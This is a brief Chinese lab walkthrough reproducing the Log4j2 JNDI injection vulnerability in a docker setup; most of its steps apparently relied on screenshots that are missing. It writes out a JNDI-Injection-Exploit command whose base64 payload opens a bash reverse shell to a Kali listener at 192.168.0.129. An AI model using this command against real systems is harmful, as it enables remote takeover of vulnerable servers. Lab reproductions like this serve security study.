当前位置:   article > 正文

Apache Log4j2 lookup JNDI 注入漏洞_log4j 漏洞 sql注入

log4j 漏洞 sql注入

1 docker启动环境

 

2 poc抓包构造payload

 

 

3 一定要在kali使用JNDIExploit进行漏洞利用,将上面Base64编码结果和攻击机ip填入指定位置

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI5Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.129

 

5 kali开启监听

 

6 上面的一个payload不行,都试过一遍。

 

7 反弹成功,payload都试过一遍,有一些不行。

 

 

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
  

闽ICP备14008679号